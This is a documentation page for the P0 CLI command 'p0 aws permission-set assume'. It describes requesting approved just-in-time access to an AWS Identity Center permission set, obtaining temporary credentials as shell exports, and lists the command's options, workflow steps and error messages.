search
Sign up for FreeKnowledge Base

p0 aws permission-set assume

hashtag
Overview

Assume an AWS permission set through AWS Identity Center (IDC) and obtain temporary AWS credentials.

  • Request just-in-time access to an AWS permission set (always creates a request).

  • Authenticate via AWS Identity Center OIDC to obtain temporary AWS credentials.

  • Output shell export commands for AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN.

  • Use command substitution to set credentials in your current shell session.

  • Credentials are cached locally for one hour to avoid repeated authentication.

hashtag
Prerequisites

  • Logged-in user: Run p0 login <org> first.

  • AWS account configured: P0 must be installed on the target AWS account with AWS Identity Center (IDC) login.

  • Permission set assignment: The requested permission set must be assigned to your user in AWS Identity Center.

circle-info

This command is only available for AWS accounts configured with AWS Identity Center (IDC). The CLI automatically detects your account type and shows either p0 aws permission-set (for Identity Center) or p0 aws role (for Okta SAML federation) based on your configuration. Run p0 aws --help to see which subcommands are available for your account.

hashtag
Syntax

p0 aws [options] permission-set assume <permission-set>

hashtag
Arguments

Argument
Type
Required
Description

<permission-set>

string

Yes

AWS permission set name to assume

hashtag
Options

Option
Type
Default
Description

--account <id>

string

-

AWS account ID or alias. Required if P0 is installed on multiple accounts.

--reason <text>

string

-

Justification for audit and approver context

--debug

boolean

false

Print debug information

circle-info

You can set P0_AWS_ACCOUNT environment variable instead of using --account for every command.

hashtag
Output

The command outputs shell export commands for AWS credentials:

When run in an interactive terminal, the output includes usage instructions. When piped or used in scripts, only the export commands are printed.

hashtag
Examples

hashtag
Assume a permission set

Uses command substitution to set AWS credentials in your current shell.

hashtag
View credentials without setting them

Prints the export commands without executing them. Copy and paste to set credentials manually.

hashtag
Use with AWS CLI

After assuming the permission set, run AWS CLI commands with the provisioned credentials.

hashtag
How it works

  1. P0 authentication: Validates your P0 session (prompts for login if expired).

  2. Access request: Creates a P0 access request and waits for approval and provisioning.

  3. AWS IDC client registration: Registers the CLI as an OIDC client with AWS Identity Center (cached for 90 days).

  4. Device authorization: Initiates AWS OIDC device authorization flow; opens browser for user consent.

  5. Token exchange: Exchanges the OIDC token for AWS credentials for the specified account and permission set.

  6. Credential output: Prints shell export commands for the AWS credentials.

circle-info

Credentials are valid for 1 hour. The command caches credentials locally to avoid repeated authentication within that period.

hashtag
Error messages

Error
Cause
Solution

Unexpected login type. Expected IDC to be enabled for account {account}

AWS account uses Okta SAML federation instead of Identity Center

This account requires p0 aws role assume. Run p0 aws --help to see available commands for your account.

Could not find an AWS account ID for this access request

Account ID not specified or not found

Specify the account with --account <id>

Timed out fetching AWS credentials. Try again...

AWS credential exchange timed out after retries

Retry the command; if issue persists, contact [email protected]

P0 is not installed on any AWS account

No AWS accounts configured in P0

Ask your P0 administrator to install the AWS integration

P0 is not installed on AWS account {account}

Specified account not found

Verify the account ID or alias

Please select a unique AWS account with --account

Multiple accounts configured

Specify which account with --account

Your request was denied

P0 access request denied by approver

Contact your approver or request with a different reason

Your request did not complete within 5 minutes.

Request approval timed out

Check your notification channel for approval status

hashtag
Related commands

  • p0 request - Request access without assuming the permission set

  • p0 login - Authenticate with P0

  • p0 ls - List available permission sets and resources

hashtag
Related documentation

Previousp0 aws role assumeNextp0 ls

Last updated